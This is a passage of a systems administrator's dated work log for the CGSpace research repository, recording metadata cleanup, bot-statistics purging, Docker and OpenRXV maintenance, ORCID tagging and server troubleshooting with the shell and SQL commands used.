+Total number of bot hits purged: 90485
+
    +
  • Then I purged a few thousand more by user agent:
  • +
+
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri 
+Found 2707 hits from MaCoCu in statistics
+Found 1785 hits from nettle in statistics
+
+Total number of hits from bots: 4492
+
    +
  • I found some CGSpace metadata in the wrong fields +
      +
    • Seven metadata in dc.subject (57) should be in dcterms.subject (187)
    • +
    • Twelve metadata in cg.title.journal (202) should be in cg.journal (251)
    • +
    • Three dc.identifier.isbn (20) should be in cg.isbn (252)
    • +
    • Three dc.identifier.issn (21) should be in cg.issn (253)
    • +
    • I re-ran the migrate-fields.sh script on CGSpace
    • +
    +
  • +
  • I exported the entire CGSpace repository as a CSV to do some work on ISSNs and ISBNs:
  • +
+
$ csvcut -c 'id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]' /tmp/2021-08-08-cgspace.csv > /tmp/2021-08-08-issn-isbn.csv
+
    +
    • Then in OpenRefine I merged all null, blank, and en fields into the en_US one for each, removed all spaces, fixed invalid multi-value separators, and removed everything other than the ISSNs/ISBNs themselves +
    • +
    • In total it was a few thousand metadata entries, so I had to split the CSV with xsv split in order to process it (the split is sketched at the end of this section)
    • +
    • I was reminded again how DSpace 6 is very fucking slow when it comes to any database-related operations, as it takes over an hour to process 200 metadata changes…
    • +
    • In total it was 1,195 changes to ISSN and ISBN metadata fields
    • +
    +
  • +
+
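  • For reference, the xsv split step mentioned above looks roughly like this (the chunk size and output directory are arbitrary):

$ xsv split -s 200 /tmp/issn-isbn-chunks /tmp/2021-08-08-issn-isbn.csv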

2021-08-09

+
    +
  • Extract all unique ISSNs to look up on Sherpa Romeo and Crossref
  • +
+
$ csvcut -c 'cg.issn[en_US]' ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c 1 -r '^[0-9]{4}' | sed 1d | sort | uniq > /tmp/2021-08-09-issns.txt
+$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
+$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
+
    +
  • Then I updated the CSV headers for each and joined the CSVs on the issn column:
  • +
+
$ sed -i '1s/journal title/sherpa romeo journal title/' /tmp/2021-08-09-journals-sherpa-romeo.csv
+$ sed -i '1s/journal title/crossref journal title/' /tmp/2021-08-09-journals-crossref.csv
+$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv > /tmp/2021-08-09-journals-all.csv
+
    +
  • In OpenRefine I faceted by blank in each column and copied the values from the other, then created a new column to indicate whether the values were the same with this GREL:
  • +
+
if(cells['sherpa romeo journal title'].value == cells['crossref journal title'].value,"same","different")
+
    +
  • Then I exported the list of journals that differ and sent it to Peter for comments and corrections +
      +
    • I want to build an updated controlled vocabulary so I can update CGSpace and reconcile our existing metadata against it
    • +
    +
  • +
  • Convert my generate-thumbnails.py script to use libvips instead of Graphicsmagick +
      +
    • It is faster and uses less memory than GraphicsMagick (and ImageMagick), and produces nice thumbnails from PDFs
    • +
    • One drawback is that libvips uses Poppler instead of Graphicsmagick, which apparently means that it can’t work in CMYK
    • +
    • I tested one item (10568/51999) that uses CMYK and the thumbnail looked OK (closer to the original than GraphicsMagick), so I’m not sure…
    • +
    • Perhaps this is not a problem after all, see this PR from 2019: https://github.com/libvips/libvips/pull/1196
    • +
    +
  • +
  • I did some tests of the memory used and time elapsed with libvips, GraphicsMagick, and ImageMagick:
  • +
+
$ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s 600 -o '%s-vips.jpg[Q=85,optimize_coding,strip]'
+39004:0.08
+$ /usr/bin/time -f %M:%e gm convert IPCC.pdf\[0\] -quality 85 -thumbnail x600 -flatten IPCC-gm.jpg 
+40932:0.53
+$ /usr/bin/time -f %M:%e convert IPCC.pdf\[0\] -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
+41724:0.59
+$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality 85 -thumbnail 600x600 IPCC-im.jpg
+24736:0.04
+
+

2021-08-11

+
    +
  • Peter got back to me about the journal title cleanup +
      +
    • From his corrections it seems an overwhelming majority of his choices match the Sherpa Romeo version of the titles rather than Crossref’s
    • +
    • Anyways, I exported the originals that were the same in Sherpa Romeo and Crossref as well as Peter’s selections for where Sherpa Romeo and Crossref differed:
    • +
    +
  • +
+
$ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d > /tmp/journals1.txt
+$ csvcut -c 'sherpa romeo journal title' ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d > /tmp/journals2.txt
+$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
+1911
+
    +
  • Now I will create a controlled vocabulary out of this list and reconcile our existing journal title metadata with it in OpenRefine
  • +
  • I exported a list of all the journal titles we have in the cg.journal field:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT(text_value) AS "cg.journal" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
+COPY 3245
+
    +
  • I started looking at reconciling them with reconcile-csv in OpenRefine, but ouch, there are 1,600 journal titles that don’t match, so I’d have to go check many of them manually before selecting a match or fixing them… +
      +
    • I think it’s better if I try to write a Python script to fetch the ISSNs for each journal article and update them that way
    • +
    • Or instead of doing it via SQL I could use CSV and parse the values there…
    • +
    +
  • +
  • A few more issues: +
      +
    • Some ISSNs are non-existent in Sherpa Romeo and Crossref, but appear on issn.org’s web search (their API is invite only)
    • +
    • Some titles are different across all three datasets, for example ISSN 0003-1305: + +
    • +
    +
  • +
  • I also realized that our previous controlled vocabulary came from CGSpace’s top 500 journals, so when I replaced it with the generated list earlier today we lost some journals +
      +
    • Now I went back and merged the previous with the new, and manually removed duplicates (sigh)
    • +
    • I requested access to the issn.org OAI-PMH API so I can use their registry…
    • +
    +
  • +
+
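  • A rough sketch of the Crossref lookup I have in mind, assuming the item already has a DOI (the requests library is an assumption; Crossref returns the journal title and ISSNs in the message object of its works API):

# Sketch: look up the journal title and ISSN(s) for a DOI via the Crossref works API
import requests

def journal_for_doi(doi: str):
    response = requests.get(f"https://api.crossref.org/works/{doi}", timeout=30)
    response.raise_for_status()
    message = response.json()["message"]
    # Both fields are lists and may be empty for some record types
    titles = message.get("container-title", [])
    issns = message.get("ISSN", [])
    return titles[0] if titles else None, issns

print(journal_for_doi("10.1016/j.agsy.2021.103263"))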

2021-08-12

+
    +
  • I sent an email to Sherpa Romeo’s help contact to ask about missing ISSNs +
      +
    • They pointed me to their inclusion criteria and said that missing journals should submit their open access policies to be included
    • +
    +
  • +
  • The contact from issn.org got back to me and said I should pay 1,000 EUR per year for 100,000 requests to their API… no thanks
  • +
  • Submit a pull request to COUNTER-Robots for the httpx bot (#45) +
      +
    • In the mean time I added it to our local ILRI overrides
    • +
    +
  • +
+

2021-08-15

+
    +
  • Start a fresh reindex on AReS
  • +
+

2021-08-16

+
    +
  • Meeting with Abenet and Peter about CGSpace actions and future +
      +
    • We agreed to move three top-level Feed the Future projects into one community, so I created one and moved them:
    • +
    +
  • +
+
$ dspace community-filiator --set --parent=10568/114644 --child=10568/72600
+$ dspace community-filiator --set --parent=10568/114644 --child=10568/35730
+$ dspace community-filiator --set --parent=10568/114644 --child=10568/76451
+
    +
  • I made a minor fix to OpenRXV to prefix all image names with docker.io so it works with fewer changes on podman +
      +
    • Docker assumes the docker.io registry by default, but we should be explicit
    • +
    +
  • +
+

2021-08-17

+
    +
  • I made an initial attempt on the policy statements page on DSpace Test +
      +
    • It is modeled on Sherpa Romeo’s OpenDOAR policy statements advice
    • +
    +
  • +
  • Sit with Moayad and discuss the future of AReS +
      +
    • We specifically discussed formalizing the API and documenting its use so that it can serve as an alternative to harvesting directly from CGSpace
    • +
    • We also discussed allowing linking to search results to enable something like “Explore this collection” links on CGSpace collection pages
    • +
    +
  • +
  • Lower case all AGROVOC metadata, as I had noticed a few in sentence case:
  • +
+
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
+UPDATE 484
+
    +
  • Also update some DOIs using the dx.doi.org format, just to keep things uniform:
  • +
+
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
+UPDATE 469
+
    +
  • Then start a full Discovery re-indexing to update the Feed the Future community item counts that have been stuck at 0 since we moved the three projects to be a subcommunity a few days ago:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    322m16.917s
+user    226m43.121s
+sys     3m17.469s
+
    +
  • I learned how to use the OpenRXV API, which is just a thin wrapper around Elasticsearch:
  • +
+
$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search?scroll=1d' \
+    -H 'Content-Type: application/json' \
+    -d '{
+    "size": 10,
+    "query": {
+        "bool": {
+            "filter": {
+                "term": {
+                    "repo.keyword": "CGSpace"
+                }
+            }
+        }
+    }
+}'
+$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ=='
+
    +
  • This uses the Elasticsearch scroll ID to page through results +
      +
    • The second query doesn’t need the request body because it is saved for 1 day as part of the first request (a Python version of this loop is sketched at the end of this entry)
    • +
    +
  • +
  • Attempt to re-do my tests with VisualVM from 2019-04 +
      +
    • I found that I can’t connect to the Tomcat JMX port using SSH forwarding (visualvm gives an error about localhost already being monitored)
    • +
    • Instead, I had to create a SOCKS proxy with SSH (ssh -D 8096), then set that up as a proxy in the VisualVM network settings, and then add the JMX connection
    • +
    • See: https://dzone.com/articles/visualvm-monitoring-remote-jvm
    • +
    • I have to spend more time on this…
    • +
    +
  • +
  • I fixed a bug in the Altmetric donuts on OpenRXV + +
  • +
  • I improved the quality of the “no thumbnail” placeholder image on AReS: https://github.com/ilri/OpenRXV/pull/114
  • +
  • I sent some feedback to some ILRI and CCAFS colleagues about how to use better thumbnails for publications
  • +
+
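  • A minimal Python version of the scroll loop above, assuming the OpenRXV wrapper returns Elasticsearch's usual _scroll_id and hits fields (it seems to, since it is a thin wrapper) and that items expose a handle field:

# Sketch: page through all CGSpace items in the OpenRXV (Elasticsearch) index
import requests

base = "https://cgspace.cgiar.org/explorer/api/search"
query = {"size": 10, "query": {"bool": {"filter": {"term": {"repo.keyword": "CGSpace"}}}}}

response = requests.post(f"{base}?scroll=1d", json=query).json()
scroll_id = response["_scroll_id"]
hits = response["hits"]["hits"]

while hits:
    for hit in hits:
        # "handle" is a guess at the field name; adjust to whatever the index uses
        print(hit["_source"].get("handle"))
    # Subsequent requests only need the scroll ID, as noted above
    response = requests.post(f"{base}/scroll/{scroll_id}").json()
    scroll_id = response.get("_scroll_id", scroll_id)
    hits = response["hits"]["hits"]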

2021-08-24

+
    +
  • In the last few days I did a lot of work on OpenRXV +
      +
    • I started exploring the Angular 9.0 to 9.1 update
    • +
    • I tested some updates to dependencies for Angular 9 that we somehow missed, like @tinymce/tinymce-angular, @nicky-lenaers/ngx-scroll-to, and @ng-select/ng-select
    • +
    • I changed the default target from ES5 to ES2015 because ES5 was released in 2009 and the only thing we lose by moving to ES2015 is IE11 support
    • +
    • I fixed a handful of issues in the Docker build and deployment process
    • +
    • I started exploring changing the Docker configuration from using volumes to COPY instructions in the Dockerfile because we are having sporadic issues with permissions in containers caused by copying the host’s frontend/backend directories and not being able to write to them
    • +
    • I tested moving from node-sass to sass, as it has been supported since Angular 8 apparently and will allow us to avoid stupid node-gyp issues
    • +
    +
  • +
+

2021-08-25

+
    +
  • I did a bunch of tests of the OpenRXV Angular 9.1 update and merged it to master (#115)
  • +
  • Last week Maria Garruccio sent me a handful of new ORCID identifiers for Bioversity staff +
      +
    • We currently have 1320 unique identifiers, so this adds eleven new ones:
    • +
    +
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-08-25-combined-orcids.txt
+$ wc -l /tmp/2021-08-25-combined-orcids.txt
+1331
+
    +
  • After I combined them and removed duplicates, I resolved all the names using my resolve-orcids.py script:
  • +
+
$ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
+
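  • The lookup that resolve-orcids.py does is roughly this (a sketch against the public ORCID API; the JSON paths are from memory, so double check them):

# Sketch: resolve an ORCID iD to a display name via the public ORCID API
import requests

def resolve_orcid(orcid: str) -> str:
    url = f"https://pub.orcid.org/v3.0/{orcid}/person"
    response = requests.get(url, headers={"Accept": "application/json"}, timeout=30)
    response.raise_for_status()
    name = response.json().get("name") or {}
    given = (name.get("given-names") or {}).get("value", "")
    family = (name.get("family-name") or {}).get("value", "")
    return f"{given} {family}".strip()

print(resolve_orcid("0000-0002-1825-0097"))  # ORCID's documented example iD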
    +
  • Tag existing items from the Alliance’s new authors with ORCID iDs using add-orcid-identifiers-csv.py (181 new metadata fields added):
  • +
+
$ cat 2021-08-25-add-orcids.csv 
+dc.contributor.author,cg.creator.identifier
+"Chege, Christine G. Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
+"Chege, Christine Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
+"Kiria, C.","Christine G.Kiria Chege: 0000-0001-8360-0279"
+"Kinyua, Ivy","Ivy Kinyua :0000-0002-1978-8833"
+"Rahn, E.","Eric Rahn: 0000-0001-6280-7430"
+"Rahn, Eric","Eric Rahn: 0000-0001-6280-7430"
+"Jager M.","Matthias Jager: 0000-0003-1059-3949"
+"Jager, M.","Matthias Jager: 0000-0003-1059-3949"
+"Jager, Matthias","Matthias Jager: 0000-0003-1059-3949"
+"Waswa, Boaz","Boaz Waswa: 0000-0002-0066-0215"
+"Waswa, Boaz S.","Boaz Waswa: 0000-0002-0066-0215"
+"Rivera, Tatiana","Tatiana Rivera: 0000-0003-4876-5873"
+"Andrade, Robert","Robert Andrade: 0000-0002-5764-3854"
+"Ceccarelli, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
+"Ceccarellia, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
+"Nyawira, Sylvia","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
+"Nyawira, Sylvia S.","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
+"Nyawira, Sylvia Sarah","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
+"Groot, J.C.","Groot, J.C.J.: 0000-0001-6516-5170"
+"Groot, J.C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
+"Groot, Jeroen C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
+"Groot, Jeroen CJ","Groot, J.C.J.: 0000-0001-6516-5170"
+"Abera, W.","Wuletawu Abera: 0000-0002-3657-5223"
+"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
+"Kanyenga Lubobo, Antoine","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
+"Lubobo Antoine, Kanyenga","Antoine Lubobo Kanyenga: 0000-0003-0806-9304" 
+$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p 'fuuu'
+

2021-08-29

+
    +
  • Run a full harvest on AReS
  • +
  • Also did more work on OpenRXV over the past few days +
      +
    • I switched the backend target from ES2017 to ES2019
    • +
    • I did a proof of concept with multi-stage builds and simplifying the Docker configuration
    • +
    +
  • +
  • Update the list of ORCID identifiers on CGSpace
  • +
  • Run system updates and reboot CGSpace (linode18)
  • +
+

2021-08-31

+
    +
  • Yesterday I finished the work to make OpenRXV use a new multi-stage Docker build system and use smarter COPY instructions instead of runtime volumes +
      +
    • Today I merged the changes to the master branch and re-deployed AReS on linode20
    • +
    • Because the docker-compose.yml moved to the root the Docker volume prefix changed from docker_ to openrxv_ so I had to stop the containers and rsync the data from the old volume to the new one in /var/lib/docker
    • +
    +
  • +

September, 2021


2021-09-02

+
    +
  • Troubleshooting the missing Altmetric scores on AReS +
      +
    • Turns out that I didn’t actually fix them last month because the check for content.altmetric still exists, and I can’t access the DOIs using _h.source.DOI for some reason
    • +
    • I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!
    • +
    • I will change DOI to tomato in the repository setup and start a re-harvest… I need to see if this is some kind of reserved word or something…
    • +
    • Even as tomato I can’t access that field as _h.source.tomato in Angular, but it does work as a filter source… sigh
    • +
    +
  • +
  • I’m having problems using the OpenRXV API +
      +
    • The syntax Moayad showed me last month doesn’t seem to honor the search query properly…
    • +
    +
  • +
+

2021-09-05

+
    +
  • Update Docker images on AReS server (linode20) and rebuild OpenRXV:
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+$ docker-compose build
+
    +
  • Then run system updates and reboot the server +
      +
    • After the system came back up I started a fresh re-harvesting
    • +
    +
  • +
+

2021-09-07

+
    +
  • Checking last month’s Solr statistics to see if there are any new bots that I need to purge and add to the list +
      +
    • 78.203.225.68 made 50,000 requests on one day in August, and it is using this user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    • +
    • It’s a fixed line ISP in Montpellier according to AbuseIPDB.com, and has not been flagged as abusive, so it must be some CGIAR SMO person doing some web application harvesting from the browser
    • +
    • 130.255.162.154 is in Sweden and made 46,000 requests in August and it is using this user agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0
    • +
    • 35.174.144.154 is on Amazon and made 28,000 requests with this user agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
    • +
    • 192.121.135.6 is in Sweden and made 9,000 requests with this user agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0
    • +
    • 185.38.40.66 is in Germany and made 6,000 requests with this user agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 BoldBrains SC/1.10.2.4
    • +
    • 3.225.28.105 is in Amazon and made 3,000 requests with this user agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
    • +
    • I also noticed that we still have tons (25,000) of requests by MSNbot using this normal-looking user agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    • +
    • I can identify them by their reverse DNS: msnbot-40-77-167-105.search.msn.com.
    • +
    • I had already purged a bunch of these by their IPs in 2021-06, so it looks like I have to do that again
    • +
    • While looking at the MSN requests I noticed tons of requests from another strange host using reverse IP DNS: malta2095.startdedicated.com., astra5139.startdedicated.com., and many others
    • +
    • They must be related, because I see them all using the exact same user agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    • +
    • So this startdedicated.com DNS is some Bing bot also…
    • +
    +
  • +
  • I extracted all the IPs and purged them using my check-spider-ip-hits.sh script (a sketch of filtering IPs by reverse DNS is at the end of this entry) +
      +
    • In total I purged 225,000 hits…
    • +
    +
  • +
+
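  • A small sketch of the reverse DNS filtering mentioned above (the input file of IPs is hypothetical; in practice I pull them out of the nginx logs first):

# Sketch: keep only IPs whose reverse DNS points at the bot domains seen above
import socket

BOT_SUFFIXES = (".search.msn.com", ".startdedicated.com")

with open("/tmp/ips.txt") as f:  # hypothetical file with one IP per line
    for ip in (line.strip() for line in f if line.strip()):
        try:
            hostname = socket.gethostbyaddr(ip)[0]
        except OSError:
            continue
        if hostname.endswith(BOT_SUFFIXES):
            print(f"{ip} {hostname}")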

2021-09-12

+
    +
  • Start a harvest on AReS
  • +
+

2021-09-13

+
    +
  • Mishell Portilla asked me about thumbnails on CGSpace being small +
      +
    • For example, 10568/114576 has a lot of white space on the left side
    • +
    • I created a new thumbnail with vipsthumbnail:
    • +
    +
  • +
+
$ vipsthumbnail ARRTB2020ST.pdf -s x600 -o '%s.jpg[Q=85,optimize_coding,strip]'
+
    +
  • Looking at the PDF’s metadata I see: +
      +
    • Producer: iLovePDF
    • +
    • Creator: Adobe InDesign 15.0 (Windows)
    • +
    • Format: PDF-1.7
    • +
    +
  • +
  • Eventually I should do more tests on this and perhaps file a bug with DSpace…
  • +
  • Some Alliance people contacted me about getting access to the CGSpace API to deposit with their TIP tool +
      +
    • I told them I can give them access to DSpace Test and that we should have a meeting soon
    • +
    • We need to figure out what controlled vocabularies they should use
    • +
    +
  • +
+

2021-09-14

+
    +
  • Some people from the Alliance contacted me last week about AICCRA metadata +
      +
    • They have internal things called Components and Clusters, so they were asking how to store these in CGSpace
    • +
    • I suggested adding new metadata values: cg.subject.aiccraComponent and cg.subject.aiccraCluster
    • +
    • On second thought, these are identifiers so perhaps this is better: cg.identifier.aiccraComponent and cg.identifier.aiccraCluster
    • +
    +
  • +
+

2021-09-15

+
    +
  • Add ORCID identifier for new ILRI staff to our controlled vocabulary +
      +
    • Also tag their twenty-five existing items on CGSpace:
    • +
    +
  • +
+
$ cat 2021-09-15-add-orcids.csv                                                                                  
+dc.contributor.author,cg.creator.identifier
+"Kotchofa, Pacem","Pacem Kotchofa: 0000-0002-1640-8807"
+$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p 'fuuuu'
+
    +
  • Meeting with Leroy Mwanzia and some other Alliance people about depositing to CGSpace via API +
      +
    • I gave them some technical information about the CGSpace API and links to the controlled vocabularies and metadata registries we are using
    • +
    • I also told them that I would create some documentation listing the metadata fields, which are mandatory, and the respective controlled vocabularies
    • +
    +
  • +
+

2021-09-16

+
    +
  • Start writing a Python script to parse input-forms.xml to create documentation for submissions (a rough first sketch of the parsing is at the end of this entry) + +
  • +
  • I decided to update all the metadata field descriptions in our registry so I can use that instead of the “hint” for each field in the input form +
      +
    • I will include examples as well so that it becomes a better resource
    • +
    +
  • +
+
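  • The first sketch of the input-forms.xml parsing, assuming the stock DSpace 6 layout (form-definitions/form/page/field elements with dc-schema, dc-element, dc-qualifier, label, required, and hint children):

# Sketch: list every field in input-forms.xml with its label, requiredness, and hint
import xml.etree.ElementTree as ET

tree = ET.parse("dspace/config/input-forms.xml")
for field in tree.iter("field"):
    schema = field.findtext("dc-schema", "")
    element = field.findtext("dc-element", "")
    qualifier = field.findtext("dc-qualifier", "")
    name = ".".join(part for part in (schema, element, qualifier) if part)
    label = field.findtext("label", "")
    required = "mandatory" if field.findtext("required", "") else "optional"
    hint = field.findtext("hint", "")
    print(f"{name}\t{label}\t{required}\t{hint}")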

2021-09-17

+ +
$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
+63
+
    +
  • Load on the server is under 1.0, and there are only about 1,000 XMLUI sessions, which seems to be normal for this time of day according to Munin
  • +
  • But the DSpace log file shows tons of database issues:
  • +
+
$ grep -c "Timeout waiting for idle object" dspace.log.2021-09-17 
+14779
+
    +
  • The earliest one I see is around midnight (now is 2PM):
  • +
+
2021-09-17 00:01:49,572 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
+2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
+
    +
  • But I was definitely logged into the site this morning so there were no issues then…
  • +
  • It seems that a few errors are normal, but there’s obviously something wrong today:
  • +
+
$ grep -c "Timeout waiting for idle object" dspace.log.2021-09-*
+dspace.log.2021-09-01:116
+dspace.log.2021-09-02:163
+dspace.log.2021-09-03:77
+dspace.log.2021-09-04:13
+dspace.log.2021-09-05:310
+dspace.log.2021-09-06:0
+dspace.log.2021-09-07:29
+dspace.log.2021-09-08:86
+dspace.log.2021-09-09:24
+dspace.log.2021-09-10:26
+dspace.log.2021-09-11:12
+dspace.log.2021-09-12:5
+dspace.log.2021-09-13:10
+dspace.log.2021-09-14:102
+dspace.log.2021-09-15:542
+dspace.log.2021-09-16:368
+dspace.log.2021-09-17:15235
+
    +
  • I restarted the server and DSpace came up fine… so it must have been some kind of fluke
  • +
  • Continue working on cleaning up and annotating the metadata registry on CGSpace +
      +
    • I removed two old metadata fields that we stopped using earlier this year with the CG Core v2 migration: cg.targetaudience and cg.title.journal
    • +
    +
  • +
+

2021-09-18

+ +

2021-09-19

+
    +
  • Improve CGSpace Submission Guidelines metadata parsing and documentation + +
  • +
  • Start a full harvest on AReS +
      +
    • The harvest completed successfully, but for some reason there were only 92,000 items…
    • +
    • I updated all Docker images, rebuilt the application, then ran all system updates and rebooted the system:
    • +
    +
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+$ docker-compose build
+

2021-09-20

+
    +
  • I synchronized the production CGSpace PostgreSQL, Solr, and Assetstore data with DSpace Test
  • +
  • Over the weekend a few users reported that they could not log into CGSpace +
      +
    • I checked LDAP and it seems there is something wrong:
    • +
    +
  • +
+
$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap-account@cgiarad.org" -W "(sAMAccountName=someaccountnametocheck)"
+Enter LDAP Password: 
+ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
+
    +
  • I sent a message to CGNET to ask about the server settings and see if our IP is still whitelisted +
      +
    • It turns out that CGNET created a new Active Directory server (AZCGNEROOT3.cgiarad.org) and decommissioned the old one last week
    • +
    • I updated the configuration on CGSpace and confirmed that it is working
    • +
    +
  • +
  • Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
  • +
+
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
+
    +
  • I added the account to the Alliance Admins group, which should allow him to submit to any Alliance collection +
      +
    • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API (a minimal example of such a deposit is sketched at the end of this entry)
    • +
    +
  • +
  • Run dspace cleanup -v process on CGSpace to clean up old bitstreams
  • +
  • Export lists of authors, donors, and affiliations for Peter Ballantyne to clean up:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
+COPY 80901
+localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
+COPY 1274
+localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
+COPY 8091
+
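  • For the Alliance TIP developers, a deposit against the DSpace 6 REST API looks roughly like this (a sketch from memory with a hypothetical collection UUID; the login and item payload formats should be verified against the REST API documentation):

# Sketch: log into the DSpace 6 REST API and create an item in a collection
import requests

base = "https://dspacetest.cgiar.org/rest"  # assuming the DSpace Test hostname
session = requests.Session()

# Login sets a JSESSIONID cookie that the session re-uses on later requests
session.post(f"{base}/login", data={"email": "tip-submit@cgiar.org", "password": "fuuuuuuuu"})

collection_uuid = "00000000-0000-0000-0000-000000000000"  # hypothetical collection UUID
item = {"metadata": [
    {"key": "dc.title", "language": "en_US", "value": "Test deposit from TIP"},
    {"key": "dc.contributor.author", "language": "en_US", "value": "Test, Author"},
]}
response = session.post(f"{base}/collections/{collection_uuid}/items", json=item)
print(response.status_code, response.text)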

2021-09-23

+
    +
  • Peter sent me back the corrections for the affiliations +
      +
    • It is about 1,280 corrections and fourteen deletions
    • +
    • I cleaned them up in csv-metadata-quality and then extracted the deletes and fixes to separate files to run with fix-metadata-values.py and delete-metadata-values.py:
    • +
    +
  • +
+
$ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
+$ csvgrep -c 'correct' -m 'DELETE' /tmp/affiliations.csv > /tmp/affiliations-delete.csv
+$ csvgrep -c 'correct' -r '^.+$' /tmp/affiliations.csv | csvgrep -i -c 'correct' -m 'DELETE' > /tmp/affiliations-fix.csv
+$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
+$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-delete.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
+
    +
